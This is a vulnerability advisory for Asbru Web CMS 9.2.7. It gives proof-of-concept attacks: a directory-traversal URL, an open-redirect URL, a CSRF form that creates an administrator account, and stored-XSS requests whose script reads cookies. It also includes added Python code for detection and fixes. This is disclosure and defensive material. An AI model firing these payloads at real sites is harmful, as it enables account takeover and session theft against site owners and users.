Asbru Web Content Management System 9.2.7 CSRF / XSS / Traversal

Posted Apr 6, 2016
Authored by LiquidWorm | Site zeroscience.mk

Asbru Web Content Management System version 9.2.7 suffers from cross site request forgery, cross site scripting, open redirection, and directory traversal vulnerabilities.

tags | exploit, web, vulnerability, xss, csrf
SHA-256 | a855a651720da4d549f9b5abc9c5497e9eafb205df8154d2cb842c4fccaf3b25


Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities


Vendor: Asbru Ltd.
Product web page: http://www.asbrusoft.com
Affected version: 9.2.7

Summary: Ready to use, full-featured, database-driven web content management
system (CMS) with integrated community, databases, e-commerce and statistics
modules for creating, publishing and managing rich and user-friendly Internet,
Extranet and Intranet websites.

Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request
Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure.

Tested on: Apache Tomcat/5.5.23
           Apache/2.2.3 (CentOS)


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2016-5314
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php


09.03.2016

--


#1
Directory Traversal:
--------------------

http://10.0.0.7/../../../../../WEB-INF/web.xml

(The dot-segments have to reach the server literally. Browsers collapse
"/../" before the request leaves the client, so replay this with a client
that sends the path unchanged, e.g. curl --path-as-is.)

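The traversal above resolves to /WEB-INF/web.xml, a directory a servlet
container must never serve. The following is an added example (not part of
the ZSL advisory or the vendor's code) that canonicalises request paths the
way RFC 3986 dot-segment removal does, including percent-encoded and
backslash variants, and flags any request that lands inside WEB-INF/ or
META-INF/. It runs over a few constructed Common Log Format lines; the
case-insensitive match and the double percent-decoding are assumptions made
to err on the side of flagging.

```python
"""Added example (not the advisory's or vendor's code): detect request paths
that resolve into WEB-INF/ or META-INF/, as the advisory's
/../../../../../WEB-INF/web.xml does, in proxy or access logs."""
from urllib.parse import unquote

# Directories a servlet container must never serve; the advisory's PoC reads
# WEB-INF/web.xml through dot-segment traversal.
PROTECTED_PREFIXES = ("/WEB-INF/", "/META-INF/")


def canonical_path(raw_path: str) -> str:
    """Percent-decode a request path (twice, to catch %252e-style double
    encoding), treat backslashes as slashes, and resolve '.' and '..'
    segments without ever climbing above '/'."""
    path = raw_path.split("?", 1)[0]
    path = unquote(unquote(path)).replace("\\", "/")
    resolved = []
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if resolved:
                resolved.pop()
            continue
        resolved.append(segment)
    return "/" + "/".join(resolved)


def targets_protected_dir(raw_path: str) -> bool:
    """True when the canonical form of raw_path is inside a protected
    directory, however many '..' segments or encodings were used.
    Matching is case-insensitive (an assumption, to be safe on
    case-insensitive filesystems)."""
    canon = canonical_path(raw_path).upper() + "/"
    return any(canon.startswith(prefix) for prefix in PROTECTED_PREFIXES)


def flag_access_log(lines):
    """Return (client_ip, raw_path) for every Common Log Format request whose
    path resolves into a protected directory."""
    hits = []
    for line in lines:
        quoted = line.split('"')
        if len(quoted) < 2:
            continue
        request = quoted[1].split()  # METHOD PATH PROTOCOL
        if len(request) < 2:
            continue
        if targets_protected_dir(request[1]):
            hits.append((line.split()[0], request[1]))
    return hits


# Constructed sample log lines (not from the advisory or any real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Mar/2016:13:29:01 +0100] "GET /index.jsp HTTP/1.1" 200 5120',
    '10.0.0.9 - - [09/Mar/2016:13:29:07 +0100] "GET /../../../../../WEB-INF/web.xml HTTP/1.1" 200 2048',
    '10.0.0.9 - - [09/Mar/2016:13:29:09 +0100] "GET /images/%2e%2e/%2e%2e/WEB-INF/web.xml HTTP/1.1" 200 2048',
    '10.0.0.9 - - [09/Mar/2016:13:29:12 +0100] "GET /docs/web-inf-notes.html HTTP/1.1" 404 310',
]

if __name__ == "__main__":
    for ip, path in flag_access_log(SAMPLE_LOG):
        print(f"traversal into protected dir from {ip}: {path}")
```

A 200 on such a request, as in the second and third constructed lines, is
the signal: Tomcat itself refuses /WEB-INF/ once the path is normalised, so
a hit with a 200 means something in front of or inside the application
served the file from an un-normalised path.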

#2
Open Redirect:
--------------

http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk

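The url parameter of login_post.jsp is followed wherever it points. As an
added example (not the vendor's code), here is the unchecked pattern beside a
same-origin validator that keeps the post-login redirect on the application
host. The host 10.0.0.7 is the advisory's test host and /webadmin/ is an
assumed safe fallback; both are assumptions for the example.

```python
"""Added example (not the vendor's code): a same-origin check for a
redirect parameter such as url= in login_post.jsp."""
from urllib.parse import urlsplit

APP_HOST = "10.0.0.7"           # the advisory's test host (assumption)
DEFAULT_LANDING = "/webadmin/"  # assumed safe fallback path (assumption)


def unchecked_redirect(url_param: str) -> str:
    """The open-redirect pattern: the parameter is used as the Location as-is."""
    return url_param


def safe_redirect_target(url_param: str, app_host: str = APP_HOST,
                         fallback: str = DEFAULT_LANDING) -> str:
    """Return url_param only if it stays on app_host, otherwise the fallback.

    Rejects absolute URLs to other hosts, scheme-relative '//host' forms,
    backslash variants ('/\\host', which browsers treat as '//host'),
    userinfo tricks ('http://10.0.0.7@evil'), non-http(s) schemes such as
    javascript:, and anything containing control characters.
    """
    if not url_param or any(ord(c) < 0x20 for c in url_param):
        return fallback
    candidate = url_param.strip().replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return fallback
    if parts.netloc:
        # Compare the host only (userinfo and port stripped), case-insensitively.
        if (parts.hostname or "").lower() != app_host.lower():
            return fallback
        # Re-emit as a local path so scheme and authority come from the app.
        candidate = parts.path or "/"
        if parts.query:
            candidate += "?" + parts.query
    # A relative target must be a single-slash absolute path.
    if not candidate.startswith("/") or candidate.startswith("//"):
        return fallback
    return candidate


if __name__ == "__main__":
    for value in ("http://www.zeroscience.mk", "//www.zeroscience.mk/",
                  "javascript:alert(1)", "/webadmin/content/"):
        print(f"{value!r:35} -> {safe_redirect_target(value)!r}")
```

The check is deliberately an allow-list on the host: matching the parameter
against a deny-list of known bad prefixes is what usually leaves the
backslash and userinfo variants open.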

#3
Cross-Site Request Forgery (Add 'administrator' With Full Privileges):
----------------------------------------------------------------------

<html>
<body>
<form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST">
<input type="hidden" name="userinfo" value="
<TEST></TEST>
" />
<input type="hidden" name="title" value="Mr" />
<input type="hidden" name="name" value="Chekmidash" />
<input type="hidden" name="organisation" value="ZSL" />
<input type="hidden" name="email" value="test@testingus.io" />
<input type="hidden" name="gender" value="1" />
<input type="hidden" name="birthdate" value="1984-01-01" />
<input type="hidden" name="birthday" value="01" />
<input type="hidden" name="birthmonth" value="01" />
<input type="hidden" name="birthyear" value="1984" />
<input type="hidden" name="notes" value="CSRFNote" />
<input type="hidden" name="userinfo1" value="" />
<input type="hidden" name="userinfoname" value="" />
<input type="hidden" name="username" value="hackedusername" />
<input type="hidden" name="password" value="password123" />
<input type="hidden" name="userclass" value="administrator" />
<input type="hidden" name="usergroup" value="" />
<input type="hidden" name="usertype" value="" />
<input type="hidden" name="usergroups" value="Account Managers" />
<input type="hidden" name="usergroups" value="Company Bloggers" />
<input type="hidden" name="usergroups" value="Customer" />
<input type="hidden" name="usergroups" value="Event Managers" />
<input type="hidden" name="usergroups" value="Financial Officers" />
<input type="hidden" name="usergroups" value="Forum Moderator" />
<input type="hidden" name="usergroups" value="Human Resources" />
<input type="hidden" name="usergroups" value="Intranet Managers" />
<input type="hidden" name="usergroups" value="Intranet Users" />
<input type="hidden" name="usergroups" value="Newsletter" />
<input type="hidden" name="usergroups" value="Press Officers" />
<input type="hidden" name="usergroups" value="Product Managers" />
<input type="hidden" name="usergroups" value="Registered Users" />
<input type="hidden" name="usergroups" value="Shop Managers" />
<input type="hidden" name="usergroups" value="Subscribers" />
<input type="hidden" name="usergroups" value="Support Ticket Administrators" />
<input type="hidden" name="usergroups" value="Support Ticket Users" />
<input type="hidden" name="usergroups" value="User Managers" />
<input type="hidden" name="usergroups" value="Website Administrators" />
<input type="hidden" name="usergroups" value="Website Developers" />
<input type="hidden" name="users_group" value="" />
<input type="hidden" name="users_type" value="" />
<input type="hidden" name="creators_group" value="" />
<input type="hidden" name="creators_type" value="" />
<input type="hidden" name="editors_group" value="" />
<input type="hidden" name="editors_type" value="" />
<input type="hidden" name="publishers_group" value="" />
<input type="hidden" name="publishers_type" value="" />
<input type="hidden" name="administrators_group" value="" />
<input type="hidden" name="administrators_type" value="" />
<input type="hidden" name="scheduled_publish" value="2016-03-13 00:00" />
<input type="hidden" name="scheduled_publish_email" value="" />
<input type="hidden" name="scheduled_notify" value="" />
<input type="hidden" name="scheduled_notify_email" value="" />
<input type="hidden" name="scheduled_unpublish" value="" />
<input type="hidden" name="scheduled_unpublish_email" value="" />
<input type="hidden" name="invoice_name" value="Icebreaker" />
<input type="hidden" name="invoice_organisation" value="Zero Science Lab" />
<input type="hidden" name="invoice_address" value="nu" />
<input type="hidden" name="invoice_postalcode" value="1300" />
<input type="hidden" name="invoice_city" value="Neverland" />
<input type="hidden" name="invoice_state" value="ND" />
<input type="hidden" name="invoice_country" value="ND" />
<input type="hidden" name="invoice_phone" value="111-222-3333" />
<input type="hidden" name="invoice_fax" value="" />
<input type="hidden" name="invoice_email" value="lab@zeroscience.tld" />
<input type="hidden" name="invoice_website" value="www.zeroscience.mk" />
<input type="hidden" name="delivery_name" value="" />
<input type="hidden" name="delivery_organisation" value="" />
<input type="hidden" name="delivery_address" value="" />
<input type="hidden" name="delivery_postalcode" value="" />
<input type="hidden" name="delivery_city" value="" />
<input type="hidden" name="delivery_state" value="" />
<input type="hidden" name="delivery_country" value="" />
<input type="hidden" name="delivery_phone" value="" />
<input type="hidden" name="delivery_fax" value="" />
<input type="hidden" name="delivery_email" value="" />
<input type="hidden" name="delivery_website" value="" />
<input type="hidden" name="card_type" value="VISA" />
<input type="hidden" name="card_number" value="4444333322221111" />
<input type="hidden" name="card_issuedmonth" value="01" />
<input type="hidden" name="card_issuedyear" value="2016" />
<input type="hidden" name="card_expirymonth" value="01" />
<input type="hidden" name="card_expiryyear" value="2100" />
<input type="hidden" name="card_name" value="Hacker Hackerowsky" />
<input type="hidden" name="card_cvc" value="133" />
<input type="hidden" name="card_issue" value="" />
<input type="hidden" name="card_postalcode" value="1300" />
<input type="hidden" name="content_editor" value="" />
<input type="hidden" name="hardcore_upload" value="" />
<input type="hidden" name="hardcore_format" value="" />
<input type="hidden" name="hardcore_width" value="" />
<input type="hidden" name="hardcore_height" value="" />
<input type="hidden" name="hardcore_onenter" value="" />
<input type="hidden" name="hardcore_onctrlenter" value="" />
<input type="hidden" name="hardcore_onshiftenter" value="" />
<input type="hidden" name="hardcore_onaltenter" value="" />
<input type="hidden" name="hardcore_toolbar1" value="" />
<input type="hidden" name="hardcore_toolbar2" value="" />
<input type="hidden" name="hardcore_toolbar3" value="" />
<input type="hidden" name="hardcore_toolbar4" value="" />
<input type="hidden" name="hardcore_toolbar5" value="" />
<input type="hidden" name="hardcore_formatblock" value="" />
<input type="hidden" name="hardcore_fontname" value="" />
<input type="hidden" name="hardcore_fontsize" value="" />
<input type="hidden" name="hardcore_customscript" value="" />
<input type="hidden" name="startpage" value="" />
<input type="hidden" name="workspace_sections" value="" />
<input type="hidden" name="index_workspace" value="" />
<input type="hidden" name="index_content" value="" />
<input type="hidden" name="index_library" value="" />
<input type="hidden" name="index_product" value="" />
<input type="hidden" name="index_stock" value="" />
<input type="hidden" name="index_order" value="" />
<input type="hidden" name="index_segments" value="" />
<input type="hidden" name="index_usertests" value="" />
<input type="hidden" name="index_heatmaps" value="" />
<input type="hidden" name="index_user" value="" />
<input type="hidden" name="index_websites" value="" />
<input type="hidden" name="menu_selection" value="" />
<input type="hidden" name="statistics_reports" value="" />
<input type="hidden" name="sales_reports" value="" />
<input type="submit" value="Initiate" />
</form>
</body>
</html>

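The form above succeeds because create_post.jsp accepts any POST carrying the
victim's session cookie. As an added example (not the vendor's code), the two
server-side checks that would refuse it are shown below, applied to
constructed headers and bodies: an Origin/Referer check against the
application's own origin, and a per-session synchronizer token compared in
constant time. The origin http://10.0.0.7 is the advisory's test host, and
the csrf_token field name, session id and request samples are all
hypothetical.

```python
"""Added example (not the vendor's code): server-side CSRF checks for a
handler such as /webadmin/users/create_post.jsp. All request data below is
constructed for the example; the csrf_token field name is hypothetical."""
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

APP_ORIGIN = "http://10.0.0.7"  # the advisory's test host, assumed to be the only app origin


def origin_allowed(headers: dict, app_origin: str = APP_ORIGIN) -> bool:
    """Accept a state-changing request only if its Origin (or, failing that,
    Referer) is the application itself. Browsers always send Origin on a
    cross-site form POST, so a request with neither header is refused
    rather than trusted by default."""
    lower = {k.lower(): v for k, v in headers.items()}
    source = lower.get("origin") or lower.get("referer")
    if not source:
        return False
    got, want = urlsplit(source), urlsplit(app_origin)
    return (got.scheme, got.netloc.lower()) == (want.scheme, want.netloc.lower())


class CsrfTokens:
    """Synchronizer token per session: HMAC(server_key, session_id).
    An attacker's page cannot read the victim's token, so it cannot put it
    in the forged form."""

    def __init__(self) -> None:
        self._server_key = secrets.token_bytes(32)

    def issue(self, session_id: str) -> str:
        return hmac.new(self._server_key, session_id.encode(), hashlib.sha256).hexdigest()

    def verify(self, session_id: str, presented: str) -> bool:
        expected = self.issue(session_id).encode()
        return hmac.compare_digest(expected, (presented or "").encode())


def create_user_allowed(headers: dict, body: str, session_id: str, tokens: CsrfTokens) -> bool:
    """Gate for the user-creation handler: both checks must pass before a
    userclass=administrator request is honoured."""
    token = parse_qs(body).get("csrf_token", [""])[0]
    return origin_allowed(headers) and tokens.verify(session_id, token)


# Constructed request, as the PoC form above would be sent from an attacker's page.
ATTACKER_HEADERS = {"Host": "10.0.0.7", "Origin": "http://attacker.example",
                    "Referer": "http://attacker.example/csrf.html",
                    "Content-Type": "application/x-www-form-urlencoded"}
ATTACKER_BODY = ("userinfo=%3CTEST%3E%3C%2FTEST%3E&username=hackedusername"
                 "&password=password123&userclass=administrator")

if __name__ == "__main__":
    tokens = CsrfTokens()
    session = "JSESSIONID-constructed"
    print("forged request accepted:",
          create_user_allowed(ATTACKER_HEADERS, ATTACKER_BODY, session, tokens))
    legit = {"Host": "10.0.0.7", "Origin": "http://10.0.0.7"}
    body = "username=alice&userclass=editor&csrf_token=" + tokens.issue(session)
    print("same-origin request with token accepted:",
          create_user_allowed(legit, body, session, tokens))
```

The token check is the one that matters; the origin check is defence in
depth, since some proxies strip Referer and a missing header should then be
a refusal, not a pass.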

#4
Stored Cross-Site Scripting:
----------------------------

a)


POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1
Host: 10.0.0.7
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygqlN2AtccVFqx0YN

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="webeditor_stylesheet"

/stylesheet.jsp?id=1,1&device=&useragent=&
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="restore"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="archive"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publish"

Save & Publish
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_publish"

2016-03-09 13:29
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_unpublish"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="checkedout"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="revision"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="title"

"><script>alert(document.cookie)</script>
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="searchable"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="menuitem"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file"; filename="test.svg"
Content-Type: image/svg+xml

testsvgxxefailed
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file_data"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="server_filename"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentdelivery"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image1"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image2"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image3"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfo"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentation"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="author"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="description"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="keywords"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfoname"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationname"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationvalue"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentpackage"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentclass"

image
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentgroup"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contenttype"

Photos
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version_master"

0
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="device"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usersegment"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usertest"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_group"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_type"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_users"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_top"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_up"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_previous"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_next"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_first"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_last"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="related"


------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="selectrelated"


------WebKitFormBoundarygqlN2AtccVFqx0YN--


b)

POST /webadmin/fileformats/create_post.jsp HTTP/1.1
Host: 10.0.0.7

filenameextension="><script>alert(document.cookie)</script>

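Both payloads above open with "> because the stored value (the content
title in a), filenameextension in b)) is written back into an HTML attribute
in the administration pages. As an added example (not the vendor's code),
the following shows the attribute breakout with a small HTML parser and the
context-aware encoding that prevents it. That the fields are rendered into a
value="..." attribute is an assumption for the example; the markup around
them is constructed.

```python
"""Added example (not the vendor's code): why "><script>... escapes an HTML
attribute, and the attribute-context encoding that stops it."""
from html import escape
from html.parser import HTMLParser

# The advisory's stored XSS payload, as submitted in title / filenameextension.
PAYLOAD = '"><script>alert(document.cookie)</script>'


def render_unescaped(field_value: str) -> str:
    """The vulnerable pattern: the stored value dropped straight into an attribute."""
    return f'<input type="text" name="title" value="{field_value}">'


def render_escaped(field_value: str) -> str:
    """Attribute context: &, <, >, " and ' must all be encoded.
    html.escape(quote=True) does exactly that."""
    return f'<input type="text" name="title" value="{escape(field_value, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records every start tag the parser sees."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def element_tags(markup: str) -> list:
    """Tags a browser-like parser builds from the markup; a 'script' entry
    means the payload broke out of its attribute and became an element."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


def script_injected(markup: str) -> bool:
    return "script" in element_tags(markup)


if __name__ == "__main__":
    for label, render in (("unescaped", render_unescaped), ("escaped", render_escaped)):
        markup = render(PAYLOAD)
        print(f"{label}: {markup}")
        print(f"  elements: {element_tags(markup)}  script injected: {script_injected(markup)}")
```

Encoding is per context: the same value placed inside a <script> block or a
URL attribute needs different encoding, and the stored copy should stay raw
so it can be encoded correctly for each place it is rendered.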